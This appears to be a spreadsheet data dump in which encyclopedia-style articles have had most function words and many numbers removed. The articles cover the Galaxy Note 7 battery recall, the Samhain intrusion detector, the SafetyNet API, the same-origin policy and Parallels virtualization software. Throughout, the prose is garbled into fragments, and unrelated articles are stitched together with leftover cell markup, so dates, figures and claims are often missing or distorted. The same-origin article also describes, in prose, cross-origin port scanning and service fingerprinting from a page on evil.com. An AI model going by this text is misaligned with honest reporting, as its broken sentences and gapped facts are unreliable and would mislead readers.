"eliminate ability work mobile devices", including restricting battery capacity blocking ability connect wireless networks. samsung stated intends recycle reusable silicon components recalled models, release refurbished models "where applicable". recall major impact samsung's business third quarter 2016, company projecting operating profits would comparison previous quarter. credit suisse analysts estimated samsung would lose least us$17 billion revenue production recall galaxy note july 2017, nine months note recall, samsung released refurbished version galaxy note known galaxy note edition (marketed samsung galaxy note fe). smaller battery 3200 supplied android nougat samsung experience operating system galaxy successor galaxy note galaxy note announced august 2017 released almost month later. specifications hardware exterior galaxy note hardware similar overall specifications design galaxy metal glass chassis, ip68 water resistance, microsd card slot. chipsets note equipped octa-core exynos 8890 system-on-chip markets, ram. china, japan, united states, note uses quad-core qualcomm snapdragon instead (which supports older cdma networks extensively used wireless carriers markets), unlike uses exynos chips market, canadian models note also snapdragon 820. note uses type-c port, marking samsung's first mobile phone symmetrical connector. display galaxy note features inches (140 1440p super amoled display. similarly "edge" models display curves side bezels device; curvature allows note millimetres (0.087 narrower galaxy note display supports high-dynamic-range video, first samsung flagship phone coated gorilla glass stylus galaxy note models, device supplied active stylus branded pen". note stylus supports 4,096 levels pressure sensitivity water resistant. camera note features 12-megapixel rear-facing camera "dual pixel" image sensor f/1.7 aperture lens. biometrics galaxy note also offers iris recognition system, using front-facing camera infrared illumination. iris scanner used unlocking, authentication features device (such samsung secure folder). fingerprint reader also embedded home button. accessories optional accessories device s-view standing cover preview window basic device functionality accessible closed, water-resistant battery case delivers power wirelessly interface. software galaxy note supplied android "marshmallow" updated version samsung's proprietary touchwiz user interface software suite codenamed "project grace". features "always-on display" mode, display clock notifications on-screen device use; different clock styles support notifications third-party apps added "grace" version. screen memo feature also leverages mode, allowing users write notes always-on display. also features several tools supporting stylus, including translation, screen magnifier, recording tool. previous suite note-taking apps also consolidated single samsung notes app.the galaxy note introduces security feature known "secure folder"; allows users create private workspace, protected authentication method, separate user data apps sandboxed main system. installed apps cloned secure folder, users designate whether notifications generated apps secure folder displayed outside secure folder based samsung knox technology, also added ability enterprises control distribution system updates, improvements mobile device management microsoft exchange server integration.the device also introduces samsung pass, platform allowing apps provide biometric authentication using iris scanner. samsung reached partnerships several major u.s. banks explore integration samsung pass mobile apps. release pre-orders galaxy note opened unveiling, release united states august 2016. samsung skipped numbering galaxy note series directly synchronize flagship galaxy series galaxy line. company stated consumers perceived galaxy note models inferior technology galaxy models numbering names digit lower.pre-orders south korea already broke records, 200,000 units pre-ordered within days. samsung canada stated pre-orders canada "outstanding". demand also forced countries malaysia, netherlands, russia, ukraine delay releases september supply shortages. reception techradar techradar said galaxy note "rich-looking, glass-and-metal-fused design" would "really people upgrading old, plastic-clad note note handsets", noted curved edges screen infrequently caused minor issues using stylus. display considered vibrant well-suited multimedia, especially support. aspects software also praised, including continued trimming samsung's touchwiz suite streamlined settings interface, already included features introduced stock operating system android "nougat" (although still initially supplied android "marshmallow"). device's stylus-oriented features, consolidated notes app, recorder, always-on display functionality commended, translation tool considered inferior google translate. galaxy note battery judged capable one-and-a-half days normal use, noted software also featured numerous estimation power-saving features. techradar concluded going stylus, note obvious choice. iris scanner make convincing enough own. otherwise, save money stick edge." technica technica critical note similarities galaxy note refreshed design commended smoother ergonomic previous samsung devices curved screens, although company panned using glass rear panel rather metal. also criticized feeling "cheap", described "hollow plastic tube would feel home 100-pack disposable pens ultra-premium $850 smartphone". iris scanner's implementation panned adding additional steps process unlocking phone comparison fingerprint reader, integrate android's integrated authentication platforms (making proprietary samsung components). warnings regarding looking sensor long also considered "just little scary". touchwiz note panned consisting mainly "'different sake different' changes much software experience" make interface less consistent third-party software removing elements material design language. conclusion, technica doubted whether galaxy note series still necessary increasing similarities main galaxy line, felt device priced high, citing chinese vendors capable undercutting prices major brands still producing phones similar specifications. android police upon release, technology journalist david ruddock android police criticized samsung galaxy note series longer targeted towards power users like years prior. ruddock stated since 2015's samsung galaxy note much except stylus sets galaxy note devices year apart respective galaxy series devices released earlier year. issues battery faults battery defects caused many note units overheat combust explode. october 2016, samsung permanently discontinued galaxy note repeated incidents.in original devices, battery produced samsung contained design flaw made electrodes top-right battery susceptible bending. this weakened separation positive negative tabs battery, resulting thermal runaway short circuits.following official recall september 2016, galaxy note re-versioned using batteries china-based contemporary amperex technology (catl atl), also supplies batteries iphone smartphones. january 2017, samsung stated batteries suffered manufacturing defect welding process, pushed electrodes caused damage separation positive negative tabs. some batteries also missing insulation tape entirely. samsung reported oversights resulted vendor's push ramp production batteries replacement phones order meet demand.due battery defects, device considered hazmat product, prohibited taken onboard many airlines stations.eventually, samsung released updates note activated charge limit charge limit made phone unusable even though charge limit removed erasing phone downgrading version stock release. initial reports august 2016, reported samsung delaying shipments galaxy note regions order perform "additional tests conducted product quality"; came alongside user reports batteries exploding charging. september, south korea's yonhap news agency reported samsung preparing recall device worldwide battery issues. september, samsung suspended sales galaxy note announced informal recall found manufacturing defect phones' batteries caused generate excessive heat, resulting fires explosions. formal u.s. recall announced september 2016. samsung exchanged affected phones revision utilized batteries sourced different supplier. however, reports emerged incidents replacement phones also caught fire, samsung recalled galaxy note worldwide october 2016, permanently ceased production device later. recalls, samsung issued software updates markets intended "eliminate ability work mobile devices", including restricting battery capacity, blocking ability connect wireless networks. samsung spokesperson stated company received reports battery failure, "account less percent entire volume sold". samsung stated hazard limited small fraction phones manufactured, released tool website september identify affected units unique imei numbers.on september 2016, u.s. federal aviation administration (faa) issued advisory warning passengers turn charge devices board aircraft. european aviation safety agency made similar statement september, stating "passengers reminded need inform cabin crew device damaged, hot, produces smoke, lost, falls seat structure." first recall september 2016, galaxy note officially recalled united states consumer product safety commission, advised owners shut cease usage device return exchange replacement. september, samsung announced newspaper advertisements would release software patch affected galaxy note devices south korea, prevents device charged beyond capacity reduce risk combustion.the galaxy note subsequently reissued batteries supplied chinese company amperex technology limited (which also serves main battery supplier iphone line). these replacement models, samsung purportedly classified safe, prominent marking packaging distinguish first wave recalled units render software battery indicators green icons. samsung granted special permission google allow change, would normally violate requirements android compatibility definition document (which must license google mobile services software android trademarks) status icons rendered white. following announcement recall, verizon wireless released software update galaxy note units purchased carrier, displays aforementioned green icons safe devices embedded recall notice affected devices device plugged unlike south korean update, include charging cut-off.samsung reported devices replaced south korea, roughly europe north america. only devices u.s. returned, 50,000 units traded different model. however, samsung stated users chose maintain loyalty company. issues replacement phones october 2016, several incidents occurred replacement galaxy note phones still suffered battery failure combustion. galaxy note owner kentucky hospitalized acute bronchitis smoke inhalation replacement device caught fire early morning october 2016. owner told local television station received text message meant samsung customer service representative, read, "just this. slow think matter, keeps threatening it".on october 2016, southwest airlines flight preparing depart louisville evacuated takeoff passenger's replacement galaxy note obtained at&amp;t retail outlet, began smoking popping turning off. samsung stated working airline investigate incident, said would unable confirm whether device replacement recovered.on october 2016, third replacement phone minnesota reportedly caught fire similar manner. second recall subsequent discontinuation response incidents involving replacement phones, united states' five major wireless carriers (at&amp;t mobility t-mobile october, along sprint corporation, verizon wireless, u.s. cellular october) subsequently announced would suspend sales galaxy note notice, pending investigation.on october 2016, samsung officially announced "[asked] carrier retail partners globally stop sales exchanges" galaxy note urged owners power "take advantage remedies available, including refund place purchase". later, samsung announced would permanently cease production galaxy note interest customer safety. samsung began issuing special kits package devices returns, consist antistatic phone inserted into, three layers boxes—the last lined ceramic fibre paper fire protection. shipping also contains instructions explicitly stating shipped air. samsung told vice's motherboard would repair refurbish returned phones would "safely dispose" them.following samsung's actions, rwanda utilities regulatory authority united states' consumer product safety commission issued official recalls galaxy note units, banning sale distribution note phone within countries. royal mail british courier company parcelforce announced would accept deliver parcels containing galaxy note online marketplaces ebay gumtree also began pull listings selling galaxy note devices. after suspension sales, oculus issued update software samsung gear virtual reality headset, blocks galaxy note safety reasons. headset included units phone promotional offer.on october 2016, u.s. federal aviation administration department transportation's pipeline hazardous materials safety administration banned note taken aboard airline flight, even powered off. qantas, virgin australia garuda indonesia issued similar bans, transport canada issued notice stating note banned flights special provision prohibitions, banning carriage damaged defective lithium-ion batteries onto flights. response travel bans, samsung announced would dedicated kiosks selected airports order allow travelers exchange receive refund galaxy note on-site departing, rather confiscated security airport staff.on december 2016, virgin america flight francisco boston nearly diverted mid-flight discovered passenger plane operating wi-fi hotspot ssid "samsung galaxy note7_1097". however, later discovered hotspot hoax passenger actually brought galaxy note onboard. disabling functionality november 2016, zealand telecommunications forum announced would galaxy note phones local mobile networks beginning november, enforced imei blacklist. november, samsung announced galaxy note devices would banned australian wireless networks effective december 2016.in december 2016, samsung announced intent cripple functionality unreturned galaxy note phones canada united states software updates. canada, update restricted charge capacity blocked phone connecting wireless networks using wi-fi bluetooth. united states, update blocked devices recharged order "eliminate ability work mobile devices".verizon announced would refuse distribute update "added risk could pose galaxy note users another device switch would "make impossible contact family, first responders medical professionals emergency situation", especially holiday season. december 2016, verizon announced would distributing update january 2017. sprint also said would distribute update january 2017. verizon later announced would redirect outgoing calls (excluding emergency calls) made unreturned galaxy note devices service hotline demanding returned, threatened charge customers equaling total retail cost phone refused comply.on january 2017, samsung released another update south korea blocked device charged beyond 15%.on march 2017, samsung released another update south korean users, barring charging galaxy note aftermath verge panned samsung's overall handling battery faults recall, arguing company initially delivered unclear messaging whether devices still safe use, well slow communication u.s. consumer product safety commission, capacity issue official recall united states. arguments based data released september 2016 research firm apteligent, stated galaxy note usage "almost exactly same" since announcement exchange program. verge also noted u.s. government's taking galaxy note phones aboard airline flights "perhaps unprecedented", acknowledging hoverboards individual airlines similar reasons—an entire class products (albeit "admittedly fire-prone cheap materials")—came close legal single consumer product terms overall magnitude. kyle weins wired felt samsung switched non-removable batteries order imitate industrial design apple used removable batteries many past models, galaxy note argued design decision exacerbated battery faults note requiring users replace entire phone instead battery. suggested samsung could "lead pack" future switching back removable batteries, "responsible" oems electronics.analysts argued recall hurt samsung's brand, would likely result company losing market share competitors, including apple google (which recently unveiled respective iphone pixel models) android vendors. credit suisse analysts predicted recall discontinuation would result samsung losing nearly us$17 billion revenue. october 2016, samsung revised earnings forecast third quarter 2016, estimating drop operating profits comparison second quarter 2016, revenue expectations trillion trillion (us$41.8 billion).on october 2016, mccunewright sued samsung filed proposed class-action lawsuit handling recall, stating company "failed reimburse consumers monthly costs associated owning unusable note samsung also panned customers affected exploding phones, alleged company refused compensate property damage caused explosions.in wake recall, samsung, along llc, exponent, rheinland, performed internal testing analysis determine exact causes defects. samsung released official findings january 2017. investigation found battery failures caused short-circuiting battery electrodes result manufacturing defects. original batteries electrodes touching fold battery layers, whereas batteries first recall, separator sheet could punctured welding defects. concurrently, company announced future battery-operated products would subject "enhanced" eight-point inspection testing protocol, including stricter visual inspections, well charge discharge tests, total volatile organic compound tests, accelerated usage tests. advisory board academics also formed.concerns also raised creation electronic waste resulting samsung's announced plan destroy returned phones rather recycling refurbishing products. february 2017, korea economic daily reported samsung considering refurbishing galaxy note modified version lower battery capacity targeted markets vietnam. representative samsung india denied reports. greenpeace disrupted press conference samsung mobile world congress protest company's unclear plans recalled devices. march 2017, samsung announced intended extract reusable parts metal, semiconductors, cameras recalled devices, market refurbished devices "where applicable".after discontinuation note features device (such samsung pass, secure folder, related features, grace eventually made available android marshmallow (e.g. galaxy (2016), galaxy (2017) series galaxy 10.1 (2016)) nougat (e.g. galaxy note (via software update), galaxy s8/s8+ galaxy series). samsung galaxy note edition (fe) june 2017, wall street journal reported samsung's plan refurbish inventory recalled phones release model designation galaxy note "fe" abbreviation "fan edition". phone also rumored named note standing "refurbished". this phone released south korea july 2017, limited availability countries follow, price $610; $255 discount price note 7.the edition smaller battery 3200 multiple safety features. software identical featuring similar includes bixby home reminders entire bixby assistant. samsung introduced eight-point battery check note make sure batteries safe current devices production. there reported incidents catching fire release first flagship device eight-point battery check, reports note catching fire.after edition released south korea, galaxy note also released select countries asia saudi arabia starting october 2017. variants galaxy note samsung exynos 8890 models sm-n930f (international single sim) sm-n930fd (international dual sim) sm-n930s (south korea telecom) sm-n930k (south korea sm-n930l (south korea qualcomm snapdragon models sm-n9300 (china open model) sm-n930v (usa verizon wireless) sm-n930az (usa cricket wireless) sm-n930p (usa sprint) sm-n930t (usa t-mobile sm-n930r4 (usa cellular) sm-n930r4 (usa straight talk) sm-n9308 (china mobile) sm-n930u (usa unlocked) sm-n930a (usa at&amp;t) sm-n930w8 (canada) scv34 (sm-n930j, japan kddi canceled) sc-01j (sm-n930d, japan docomo, canceled) galaxy note edition (fe) samsung exynos 8890 models sm-n935f (international) sm-n935f/ds (international dual sim) sm-n935s (south korea telecom) sm-n935k (south korea sm-n935l (south korea also samsung galaxy series android smartphones, mobile computing device android applications samsung galaxy note series discontinued series high-end android phablets smartphones references external links official website (archived) galaxy note safety recall program</t>
  </si>
  <si>
    <t>Samhain (software)</t>
  </si>
  <si>
    <t>samhain integrity checker host intrusion detection system used single hosts well large, unix-based networks. supports central monitoring well powerful (and new) stealth features undetected memory, using steganography. main features complete integrity check uses cryptographic checksums files detect modifications, find rogue suid executables anywhere disk, centralized monitoring native support logging central server encrypted authenticated connections tamper resistance database configuration files signed file entries e-mail reports signed support stealth operation also host-based intrusion detection system comparison references external links samhain homepage</t>
  </si>
  <si>
    <t>SafetyNet API</t>
  </si>
  <si>
    <t>safetynet consists several application programming interfaces (apis) offered google play services support security sensitive applications. currently, apis include device integrity verification, verification, recaptcha address verification. safetynet attestation safetynet attestation api, apis safetynet umbrella, provides verification integrity device compromised. practice, non-official roms lineageos fail hardware attestation thus restrict user enjoying pure android implementation (without google services) able third-party apps (mainly banking). this, consider monopolistic practice deterring entrance competing mobile operating systems market. safetynet attestation (one four apis safetynet umbrella) deprecated replaced play integrity soon. like safetynet apis, play integrity offered google services thus available totally free android environments (aosp). therefore, apps require available refuse execute aosp builds. references external links protect security threats safetynet universal safetynet work? safetynet attestation deprecation timeline play integrity documentation play integrity migration guide</t>
  </si>
  <si>
    <t>Same-origin policy</t>
  </si>
  <si>
    <t>computing, same-origin policy (sometimes abbreviated sop) important concept application security model. under policy, browser permits scripts contained first page access data second page, pages origin. origin defined combination scheme, host name, port number. this policy prevents malicious script page obtaining access sensitive data another page page's document object model. this mechanism bears particular significance modern applications extensively depend http cookies maintain authenticated user sessions, servers based http cookie information reveal sensitive information take state-changing actions. strict separation content provided unrelated sites must maintained client-side prevent loss data confidentiality integrity. important remember same-origin policy applies scripts. this means resources images, css, dynamically-loaded scripts accessed across origins corresponding html tags (with fonts notable exception). attacks take advantage fact origin policy apply html tags. history concept same-origin policy introduced netscape navigator 2.02 1995, shortly introduction javascript netscape 2.0. javascript enabled scripting pages, particular programmatic access document object model (dom). policy originally designed protect access dom, since broadened protect sensitive parts global javascript object. implementation modern browsers implement form same-origin policy important security cornerstone. policies required match exact specification often extended define roughly compatible security boundaries technologies, microsoft silverlight, adobe flash, adobe acrobat, mechanisms direct manipulation, xmlhttprequest. origin determination rules algorithm used calculate "origin" specified 6454, section absolute uris, origin triple {scheme, host, port}. hierarchical element naming authority (see 3986, section 3.2) absolute uri, globally unique identifier used. resources considered origin values exactly same. illustrate, following table gives overview typical outcomes checks "http://www.example.com/dir/page.html". unlike browsers, internet explorer include port calculation origin, using security zone place. read access sensitive cross-origin responses reusable authentication same-origin policy protects reusing authenticated sessions across origins. following example illustrates potential security risk could arise without same-origin policy. assume user visiting banking website out. then, user goes another site malicious javascript code requests data banking site. because user still logged banking site, malicious code could anything user could banking site. example, could list user's last transactions, create transaction, etc. this because, original spirit world wide web, browsers required along authentication details session cookies platform-level kinds authorization request header banking site based domain banking site. bank site owners would expect regular browsers users visiting malicious site allow code loaded malicious site access banking session cookie platform-level authorization. while true javascript direct access banking session cookie, could still send receive requests banking site banking site's session cookie. same origin policy introduced requirement security-minded browsers deny read access responses across origins, assumption majority users choose compliant browsers. policy deny writes. counteracting abuse write permission requires additional csrf protections target sites. relaxing same-origin policy circumstances, same-origin policy restrictive, posing problems large websites multiple subdomains. first, number workarounds using fragment identifier window.name property used pass data documents residing different domains. modern browsers support multiple techniques relaxing same-origin policy controlled manner: data tainting netscape navigator briefly contained taint checking feature. feature experimentally introduced 1997 part netscape feature turned default, enabled user would allow websites attempt read javascript properties windows frames belonging different domain. browser would user whether permit access question. document.domain property windows frames) contain scripts domain value, same-origin policy relaxed windows, window interact other. example, cooperating scripts documents loaded orders.example.com catalog.example.com might document.domain properties “example.com”, thereby making documents appear origin enabling document read properties other. setting property implicitly sets port null, browsers interpret differently port even unspecified port. assure access allowed browser, document.domain property pages.the document.domain concept introduced part netscape navigator released 1996. cross-origin resource sharing technique relaxing same-origin policy standardized name cross-origin resource sharing (cors). this standard extends http origin request header access-control-allow-origin response header. allows servers header explicitly list origins request file wildcard allow file requested site. browsers firefox 3.5, safari internet explorer header allow cross-origin http requests xmlhttprequest would otherwise forbidden same-origin policy. cross-document messaging another technique, cross-document messaging allows script page pass textual messages script another page regardless script origins. calling postmessage() method window object asynchronously fires "onmessage" event window, triggering user-defined event handlers. script page still cannot directly access methods variables page, communicate safely message-passing technique. jsonp since html &lt;script&gt; elements allowed retrieve execute content domains, page bypass same-origin policy receive json data different domain loading resource returns jsonp payload. jsonp payloads consist internal json payload wrapped pre-defined function call. when script resource loaded browser, designated callback function invoked process wrapped json payload. websockets modern browsers permit script connect websocket address without applying same-origin policy. however, recognize websocket used, insert origin: header request indicates origin script requesting connection. ensure cross-site security, websocket server must compare header data whitelist origins permitted receive reply. corner cases behavior same-origin checks related mechanisms well-defined number corner cases pseudo-protocols clearly defined host name port associated urls (file:, data:, etc.). this historically caused fair number security problems, generally undesirable ability locally stored html file access files disk, communicate site internet. lastly, certain types attacks, rebinding server-side proxies, permit host name check partly subverted, make possible rogue pages directly interact sites addresses "true", canonical origin. impact attacks limited specific scenarios, since browser still believes interacting attacker's site, therefore disclose third-party cookies sensitive information attacker. attacks face same-origin policy even same-origin policy effect (without relaxed cross-origin resource sharing), certain cross-origin computer attacks performed. webrtc used find internal address victim. attempting connect cross-origin port, responses cannot read face same-origin policy, javascript still make inferences whether port open closed checking onload/onerror event fires, timeout. this gives opportunities cross-origin portscanning. further, javascript even fingerprint services cross-origin taking advantage default files. example, javascript loaded site evil.com attempts open file http://127.0.0.1/images/jenkins.png, onload event fires, inferred victim runs jenkins computer. this way, attacker find potentially vulnerable services example internal network, even face same-origin policy. should service vulnerable cross-site request forgery, even compromised. also cross-origin resource sharing cross-site scripting cross-site request forgery cross-document messaging content security policy further reading same-origin policy lines less. references external links detailed comparison several flavors same-origin policies review deficiencies same-origin policies implication security wayback machine (archived february 2007) sample vendor-provided same-origin policy specification html5 spec's definition origin article same origin policy 6454 origin concept blog post: cookie same origin policy wordpress.org plugin content security policy</t>
  </si>
  <si>
    <t>Parallels RAS</t>
  </si>
  <si>
    <t>parallels application virtualization software produced parallels allows windows applications accessed individual devices shared server cloud system. parallels first released 2014 software. product overview parallels application virtualization software delivers centrally-hosted windows applications local devices without necessity installing them.with parallels ras, windows applications used devices typically could them, including macintosh computers, mobile devices, google chromebook.parallels accessed devices parallels client. software delivered on-premises public, private, hybrid clouds. also parallels software references external links official website</t>
  </si>
  <si>
    <t>Parallels Desktop for Mac</t>
  </si>
  <si>
    <t>parallels desktop software providing hardware virtualization macintosh computers intel processors, since version 16.5 also apple silicon-based macintosh computers. developed parallels, since 2018 subsidiary corel. overview parallels, inc. developer desktop server virtualization software. history released june 2006, first software product bring mainstream virtualization macintosh computers utilizing apple–intel architecture (earlier software products software emulated environment). name initially 'parallels workstation consistent company's corresponding linux windows products. this name well received within community, felt name, particularly term “workstation,” evoked aesthetics windows product. parallels agreed: “since we've great product, make look sound like product...”, therefore renamed ‘parallels desktop mac’.on january 2007, parallels desktop awarded “best show” macworld 2007. technical parallels desktop hardware emulation virtualization software, using hypervisor technology works mapping host computer's hardware resources directly virtual machine's resources. each virtual machine thus operates identically standalone computer, virtually resources physical computer. because guest virtual machines hardware drivers irrespective actual hardware host computer, virtual machine instances highly portable computers. example, running virtual machine stopped, copied another physical computer, restarted. parallels desktop able virtualize full standard hardware, including virtualized type host's physical processor, acpi compliance system, generic motherboard compatible intel i965 chipset, guest virtual machines, video (vram), svga video adapter vesa support opengl directx 10.1 acceleration, 1.44 floppy drive, mapped physical drive image file, four devices. this includes virtual hard drives ranging size cd/dvd-rom drives. virtual cd/dvd-rom drives mapped either physical drives image files. dvd/cd-rom “pass-through” access, four serial ports mapped pipe output file, three bi-directional parallel ports, mapped real port, real printer, output file, ethernet virtual network card compatible realtek rtl8029(as), capable network interface connections, eight devices devices, ac'97-compatible sound card. 104-key windows enhanced keyboard ps/2 wheel mouse. version history version first official release version february 2007, build 3186. version brought support devices, expanded number devices supported native speed, including support built-in isight webcams. amount video allocated guest made adjustable, 32mb. full featured cd/dvd drives arrived version, allowed user burn disks directly virtual environment, play copy-protected would addition, shared clipboard drag-drop support guest implemented. this version brought ability users windows installation upgrade windows vista within environment. feature known coherence added, removed windows chrome, desktop, virtualization frames create seamless desktop environment windows applications. this version also allowed users boot existing boot camp windows partitions, eliminated need multiple windows installations mac. tool called parallels transporter included allow users migrate windows existing vmware virtual parallels desktop mac. netsys lawsuit 2007, german company netsys gmbh sued parallels' german distributor avanquest copyright violation, claiming parallels desktop parallels workstation directly based line products called “twoostwo” parallels developed paid commission netsys, says, netsys assigned copyrights. additionally, lawsuit claimed parallels desktop 2.5's compatibility “twoostwo” showed software products essentially functional core. when netsys lost initial urgency proceeding, filed suit, requested temporary injunction landgericht district court berlin. version june 2007 build 4124 released first publicly available version desktop 3.0. version retained functionality previous versions added features tools. support directx opengl added, allowing users play windows games without need boot windows boot camp. feature called smartselect offers cross file application integration allowing user open windows files programs vice versa. parallels explorer introduced, allows user browse windows system files without actually launching windows. snapshot feature included, allowing restore virtual machine environment previous state case issues. further, parallels added security manager limit amount interaction windows installations. this version included long-awaited complete “parallels tools'” driver suite linux guest operating systems. therefore, integration linux guest-os's greatly improved.despite addition numerous features, tools added functionality, first iteration parallels desktop missing features parallels planned parallels, inc. representative stated macworld january 2007 version would bring accelerated graphics, “multi-core virtual machines/virtual smp, scsi support, mac-like feel, well sophisticated coherence mode, dubbed coherence 2.0”. while accelerated graphics materialised, coherence, well overall look feel parallels desktop changed slightly. also, scsi support implemented.it currently unknown features abandoned altogether, show later build version 3.0. build 4560, released july 2007, added imaging tool allowed users capacity virtual disks. feature update build 5160, released september 2007, added features updated current features. release focused updates coherence, support exposé, window shadows, transparent windows, ability overlap several windows windows. further, parallels' image tool updated allow change virtual hard disk format plain expanding. parallels explorer updated allow automatically mount offline hard drive desktop. some features added iphone support windows, allowing itunes windows sync users mirror desktops folders. further, drives mapped windows sound devices changed fly’. allocated virtual machine, total available.parallels desktop build 5608 added support guest parallels tools linux latest linux distributions (including ubuntu also added support running graphics windows virtual machines leopard 10.5.3. code wine project according parallels' licensing page, desktop version contains direct3d code originally developed wine open-source project. wine software licensed lesser general public license, required parallels release source code. parallels released modified source code july 2007, weeks promised release date. parallels spokesman explained reasons delay message official company blog. version version 4.0, released november 2008, updates gui, adds features, enhances performance consumes 15–30% less power previous versions. version first version supports 32-bit 64-bit guest operating systems. parallels desktop mac's support includes directx 9.0, directx pixel shader opengl well video memory. also adds support virtual machine 8-way smp. parallels desktop introduces adaptive hypervisor, allows users focus host computer's resources towards either host guest operating system.parallels desktop adds features fourth viewing mode called modality, allows users scale size active guest operating system mac's desktop screenshot utility called clips, lets users take share screenshots host guest operating systems. start menu integration automatic windows notifications apple menu bar. ability select voice commands remotely control virtual machine. ability start stop virtual machine iphone. (requires installing iphone application apple's appstore.)starting version release, parallels desktop logo, resembles aluminum imac, appears windows screen parallel lines overlaid right side. feature update build 3810, released january 2009, includes performance enhancements features, directx shaders model vertex shader support additional support intel streaming simd extensions (sse4) better media applications performance. build 3810 also adds support running windows running snow leopard server either host guest os.also included usability features ability share windows files dragging directly application dock. windows also automatically start background user opens windows application desktop. version drew criticism problems upgrading version shortly initial release. build 3810 also addresses installation upgrade issues previously experienced version introduces option enroll company's customer experience program, lets customers provide information preferences user priorities. version officially released november 2009, parallels desktop adds several features, mainly improve integration host features include: graphics speed improvements optimized 10.6 (snow leopard) support windows theming windows applications make look like native applications support multi-touch gestures (from trackpad magic mouse) apple remote ability drag drop formatted text images windows, linux, applications, ability system administrator lock virtual machine users can't change state virtual machine, support opengl linux guest virtual machines. support directx shader model feature update build 9308, released december 2009, added features. linux guest operating systems parallels tools support xorg fedora virtual machines (experimental) parallels tools support mandriva 2010 (experimental) opensuse 11.1 installation media auto detection virtualization improved performance mass storage. windows guest operating systems improved resume suspend virtual machines multiple monitors assigned. improved performance file access shared folders. video improved performance video playback windows vista windows windows aero available default machines intel x3100 graphic adapters (some macbook mini models). available macbooks nvidia 9400m graphics cards. vertical synchronization configurable. configure settings using corresponding option virtual machine video configuration page. improved performance video game mirror's edge. macos server guest operating system ability pass kernel options macos server guest added. enable "select boot device startup" option virtual machine configuration, enable specify necessary kernel options 5-second timeout booting kernel. version officially announced september 2010 launched september 2010, parallel full 64-bit support first time. parallels claims parallels desktop "[has] improved features, including speed previous version." specific features include: all-new 64-bit engine surround sound support better import implementation vmware, virtual virtual machines boot camp partitions improved network, hard drive transporter performance windows program spotlight integration faster windows launch time enhanced graphics better previous versions ability extend parental controls windows applications ability keyboard shortcuts windows applications enhanced spaces exposé support version officially announced september 2011 released september 2011, parallels desktop adds many features. these include: integration 10.7.4 "lion": full-screen support launchpad windows apps mission control support lion guest lion animations support improved user interface standard help documentation shared devices longer battery life parental controls support support intel aes-ni encryption enhanced performance graphics support video memory virtual machine enhanced audio support surround sound added support windows version officially announced august 2012 released september 2012, parallels desktop adds many features: 10.8 "mountain lion" guest retina resolution passed virtual machines windows windows automatically optimised best experience retina parallels desktop notifications notification center support windows toast notifications mountain lion dictation windows apps full screen demand windows applications coherence presentation wizard open internet explorer button safari drag drop file outlook dock opens email attachment multi-language keyboard sync windows full support modern windows applications (dock, mission control, launchpad) reworked keyboard shortcuts preferences standard system preferences parallels desktop application shortcuts. resources (cpu/ram) monitoring indication hard drive space usage shared bluetooth improved virtual machine boot time/windows boots time faster previous version pause resume windows faster previous version input/output (i/o) operations faster previous version games faster previous version directx support full support faster connections peripheral devices virtual machines starting parallels desktop 8.0.18305 version officially announced august 2013 released september 2013, parallels desktop includes features enhancements: brings back "real" start menu windows enables modern apps separate windows instead full screen power support, applications stay up-to-date retina display macbook computers thunderbolt firewire storage devices designated connect windows virtual machine sticky multi-monitor setup remembers settings puts windows virtual machines back full screen mode remote monitor sync icloud, skydrive, dropbox without unnecessary duplication files windows apps launch mountain lion dictionary dictionary gesture enhanced integration macos linux users enhanced virtual machine wizard makes easier virtual machine, especially computers without hard drives printer windows print windows application desktop, even application functionality compatibility 10.9 "mavericks" easily install access complimentary security software subscriptions location better disk performance previous versions virtual machines shut faster suspend faster parallels desktop graphics browsing faster parallels desktop 8enterprise version: expiration date virtual machine. virtual machines headless mode. start virtual machines boot.version last version support snow leopard. version released august 2014, parallels desktop includes support 10.10 "yosemite", ends support snow leopard.less year release release, parallels spokesperson john uppendahl confirmed version fully compatible windows coherence mode, integrates windows user interface updated users need purchase upgrade version continue using feature. version released august 2015, parallels desktop includes support windows ready 10.11 capitan".parallels desktop available one-time purchase $79.99 desktop edition, annual subscription $99.99 edition. version multiple issues macos 10.13, high sierra. website currently offers full price upgrade version correction, effectively making version obsolete macos upgrades. version released august 2016. version released august 2017, parallels desktop provides macos high sierra readiness support upcoming windows features. according parallels, version makes simple macbook users windows applications touch bar, touch within windows applications. also first solution bring upcoming windows people feature mac, including integration dock spotlight. version also features percent performance improvements completing certain tasks. update also brings slightly refreshed better match macos visual improvements windows users retina displays. version released august 2018, parallels desktop supports macos 10.14 "mojave". version released august 2019. version released august 2020., parallels desktop comes following highlights: ready macos architecture windows linux vms, directx percent faster improvements opengl graphics battery life users activate “travel mode” windows percent longer windows apps users zoom rotate trackpad windows apps more printing options: print sides paper sizes envelope.new features added parallels desktop edition: easier export virtual machine compressed format prepare transfer another give custom networks individual nameon april 2021, parallels updated software version 16.5, notably adding support apple silicon-based macs. macs, arm-compatible oses vms; parallels emulate architecture. supported guest oses include windows insider builds windows retail versions windows installation disk images versions publicly available), well builds various linux distributions. version released august 2021, parallels desktop comes following highlights: optimized apple chip. added support devices. added multi-monitor support linux. added drag-and-drop support text graphics windows applications. version 17.1, released october 2021, fully compatible macos monterey adds support windows guest version released august 2022, parallels desktop comes following highlights: brings full support promotion displays 14-inch 16-inch macbook pros. easier windows setup. enhanced windows game-play experience mac. supported operating systems parallels desktop business, home editions requires versions macos: parallels desktop partially support macos high sierra: coherence mode windows appear macos windows, graphics artifacts occur. neither parallels desktop fully support apple file system (apfs) disks, including virtual disks boot camp partitions. therefore, high sierra guest machine must installed 'manually' passing "--converttoapfs command line switch, cannot automated parallels virtual machine creation process. versions partially compatible corresponding macos versions work correctly. guest parallels desktop includes support variety different guest operating systems: several versions windows: windows windows 8.1, windows windows server 2019, windows server 2016, windows server 2012 windows (sp0-sp1), windows server 2008 (sp0-sp2), windows vista home, business, ultimate enterprise (sp0-sp2), windows server 2003 (sp0-sp2), windows (sp0-sp3), windows 2000 professional sp4, windows 2000 server linux distributions: enterprise linux (rhel) centos linux fedora linux ubuntu 20.04, 19.10, 19.04, 18.04 16.04 lts, debian gnu/linux suse linux enterprise opensuse linux 15.2, 15.1 linux mint kali 2020.2, 2019 2018, elementary 5.0, manjaro mageia android (only users download version installation assistant parallels desktop) also possible install macos versions macos macos catalina 10.15, macos mojave 10.14, macos high sierra 10.13, macos sierra 10.12, capitan 10.11, yosemite 10.10, mavericks 10.9, mountain lion 10.8, lion 10.7, lion server 10.7, snow leopard server 10.6, leopard server 10.5in parallels desktop mac, support guest operating systems includes variety 32-bit 64-bit operating systems, including: ms-dos multiple versions windows, including windows windows 